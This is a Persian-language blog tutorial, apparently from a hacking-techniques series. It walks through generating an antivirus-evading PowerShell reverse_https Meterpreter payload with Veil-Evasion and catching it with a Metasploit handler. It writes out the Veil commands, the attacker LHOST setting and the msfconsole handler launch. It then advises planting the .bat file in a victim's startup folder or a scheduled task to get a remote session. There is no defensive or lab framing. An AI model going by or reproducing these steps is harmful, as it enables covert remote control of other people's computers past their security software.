ابزار ویل و پاورشل

منتشر شده در دسته : راهکارهای هکر

ابزار ویل (Veil) به منظور عبور از آنتی ویروس ابزار بسیار مناسبی است هرچند این ابزار قادر به این فایل‌های اجرایی مترپرتر پاورشل می‌باشد . من واقعاً فایل‌های پاورشل را بر دیگر باینری ها ترجیح می‌دهد چرا که شما واقعاً نمی‌دانید با چه آنتی ویروسی مواجه می‌شوید . بیایید خیلی سریع یک پیلود توسط ابزار ویل ایجاد کنیم .

ابزار ویل

ابزار ویل را در مرحله نصب ابزارها ، نصب کرده‌ایم . برای شروع دستورهای زیر را وارد کنید :

cd /opt/Veil/Veil-Evasion/
./Veil-Evasion.py

ویل و پاورشل

با منو اصلی ویل مواجه می‌شوید که دارای ۴۶ پیلود می‌باشد و دستوراهای موجود به همراه توضیحات نمایش داده می‌شود . برای نمایش پیلودهای موجود دستور list را وارد کنید . لیست پیلودها به همراه شماره ای نمایش داده می‌شود :

ویل و پاورشل

ویل و پاورشل

ما می‌خواهیم از پیلود reverse_https استفاده کنیم به همین منظور شماره ۲۱ را وارد می‌کنیم . البته همانطور که در توضیحات منو مشاهده می‌کنید برای استفاده از یک پیلود بخصوص بایستی از دستور use استفاده کنیم . پس می نویسیم :use 21

ویل و پاورشل

مشاهده می‌کنید که پیلود مورد نظر ما بارگذاری می‌شود . هر پیلود دارای یکسری گزینه های ضرور می‌باشد که برای استفاده بایستی این گزینه ها تعیین شود . گزینه هایی که دارای مقدار پیش‌فرض هستند ضرورتاً نیازی به تعیین آن‌ها نیست و می‌توان از مقدار پیش‌فرض استفاده کرد . پس ما در اینجا فقط گزینه LHOST که همان آدرس آیپی سیستم مهاجم هست را تعیین می‌کنیم . برای تعیین از دستور set استفاده می‌کنیم . یعنی می نویسیم :

set LHOST 192.168.1.6

ویل و پاورشل

سپس به منظور ایجاد پیلود generate را وارد می‌کنیم .
پیلود ما با زبان پاورشل ایجاد می‌شود . این پیلود از نوع Reverse_https می‌باشد و گزینه های مورد نیاز آن را مشاهده می‌کنید . در اینجا دو فایل برای ما ایجاد می‌شود . یکی فایل اصلی پیلود با پسوند bat و دیگر فایل هندلر با پسوند rc

ویل و پاورشل
به مسیر زیر رفته و با دستور cat محتویات فایل bat را مشاهده می‌کنیم :

cd /root/veil-output/source/
cat reverse_https.bat

ویل و پاورشل

این یک فایل پاورشل فشرده bat می‌باشد که معماری پردازشگر را تشخیص داده و پیلود مناسب پاورشل برای ایجاد اتصال بازگشتی به شنونده را پیاده‌سازی می‌کند .
فایل دومی که ایجاد می‌شود یک فایل منبع متااسپلوییت است و همانطور که قبلاً هم دیدیم این فایل هندلر را پیاده‌سازی می‌کند تا پیلودهای پاورشل را قبول کند . فایل منبع را با استفاده از دستور زیر اجرا کنید :

msfconsole -r /root/veil-output/handlers/reverse_https_handler.rc

ویل و پاورشل

مشاهده می‌کنید که کنسول متااسپلوییت به صورت خودکار باز شده و دستورهای درون فایل منبع اجرا شده و یک اکسپلوییت به صورت فایل در پس زمینه اجرا می‌شود و هندلر و پیلود شروع به کار می‌کنند .

ویل و پاورشل

در این مرحله چند کار می‌توانید انجام دهید . یکی اینکه فایل bat ایجاد شده در مراحل قبلی را به پوشه startup قربانی منتقل کنیم و یا یک وظیفه برنامه‌ریزی شده در سیستم قربانی هدف برای اجرا ایجاد کنید . به هر ترتیب شما بایستی به شیوه ای فایل bat را در سیستم قربانی اجرا کنید . پس از اجرای فایل bat در سیستم قربانی (از طریق پاورشل به سادگی انجام می شود) ، به کنسول متااسپلوییت بازگردید و نشست های فعال را با دستور sessions لیست کنید . مشاهده می‌کنید که یک نشست با سیستم قربانی ایجاد شده است .

با استفاده از شناسه نشست و دستور sessions -i با نشست ارتباط برقرار کنید .

ملاحظه می‌کنید که اجرای دستور sysinfo مشخصات سیستم قربانی نمایش داده می‌شود .

ویل و پاورشل

لیست دروس

خوشحال می شویم دیدگاههای خود را در میان بگذارید * فرصت پاسخگویی به سوالات در بلاگ وجود ندارد

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *